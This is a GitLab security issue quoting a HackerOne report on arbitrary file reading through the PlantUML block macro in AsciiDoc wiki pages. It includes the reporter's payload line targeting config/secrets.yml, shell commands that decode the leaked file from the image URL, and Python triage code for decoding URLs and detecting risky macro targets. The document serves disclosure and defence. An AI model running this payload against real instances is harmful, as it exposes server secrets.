Remote file inclusion via Asciidoc plantuml render

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2871063 by yvvdwf on 2024-11-29:


Report

GitLab recently updated to the new version 0.1.1 of asciidoctor-plantuml, which enables BlockMacroProcessor by default. This allows reading arbitrary files.

Reproduction procedure

  • create a new project, go to its wiki, then add an AsciiDoc file with the following content:

        test include file

        plantuml::config/secrets.yml[]

wiki.png

  • save the file, then open the rendered page; you should see an (error) image which represents a part of the config/secrets.yml file

  • decode the src attribute of the image to get the complete file content:

        ###  original url (the src attribute of the rendered image)
        url="https://plantuml.gitlab-static.net/png/[REDACTED]"

        ###  get last element (the PlantUML-encoded diagram source)
        string=${url##*/}

        echo "$string"

        ###  decode with the PlantUML CLI
        docker run ghcr.io/plantuml/plantuml -decodeurl "$string"

Impact

Arbitrary file inclusion leading to remote code execution

Note:

  • I've tested this on staging.gitlab.com from 51.195.254.173
  • I think that the vulnerable code should be deployed automatically on gitlab.com in a few hours. Perhaps you can stop it

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:
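Added example for triage (not part of the HackerOne report or GitLab's code): a Python reimplementation of the PlantUML URL encoding, so the image src from a rendered page can be decoded offline the same way `plantuml -decodeurl` does, plus a check that flags `plantuml::` block macros in wiki AsciiDoc whose target is absolute, traverses with `..`, or leaves an assumed allowed directory (`diagrams/` is a placeholder). The sample AsciiDoc content is the report's own payload line; the `~h` hex and legacy `~0` encodings are not handled.

```python
import base64
import re
import zlib
from pathlib import PurePosixPath

# PlantUML server URLs carry the diagram source as raw DEFLATE data, base64-encoded
# with this alphabet (digits, upper, lower, '-', '_') and no padding.
_PLANTUML_ALPHABET = ("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                      "abcdefghijklmnopqrstuvwxyz-_")
_STD_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                 "0123456789+/")
_TO_STD = str.maketrans(_PLANTUML_ALPHABET, _STD_ALPHABET)
_TO_PUML = str.maketrans(_STD_ALPHABET, _PLANTUML_ALPHABET)


def plantuml_encode(text: str) -> str:
    """Encode diagram text the way a PlantUML server expects it in a URL."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: raw deflate, no zlib header
    raw = comp.compress(text.encode("utf-8")) + comp.flush()
    return base64.b64encode(raw).decode("ascii").rstrip("=").translate(_TO_PUML)


def plantuml_decode(encoded: str) -> str:
    """Inverse of plantuml_encode; equivalent to `plantuml -decodeurl`."""
    if encoded.startswith("~1"):  # optional marker for the deflate encoding
        encoded = encoded[2:]
    std = encoded.translate(_TO_STD)
    std += "=" * (-len(std) % 4)  # restore base64 padding
    return zlib.decompress(base64.b64decode(std), -15).decode("utf-8")


def decode_image_url(url: str) -> str:
    """Decode the diagram source from a rendered image URL (last path element)."""
    return plantuml_decode(url.rstrip("/").rsplit("/", 1)[-1])


# A `plantuml::<target>[...]` block macro on its own line; the report shows that
# <target> is opened as a file relative to the rendering process (config/secrets.yml).
_BLOCK_MACRO = re.compile(r"^plantuml::(?P<target>\S+?)\[(?P<attrs>[^\]]*)\]\s*$", re.M)


def find_file_includes(asciidoc: str, allowed_prefix: str = "diagrams/") -> list:
    """Return block-macro targets that are absolute, traverse, or leave allowed_prefix."""
    flagged = []
    for m in _BLOCK_MACRO.finditer(asciidoc):
        target = m.group("target")
        p = PurePosixPath(target)
        if p.is_absolute() or ".." in p.parts or not target.startswith(allowed_prefix):
            flagged.append(target)
    return flagged
```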

Edited by Greg Myers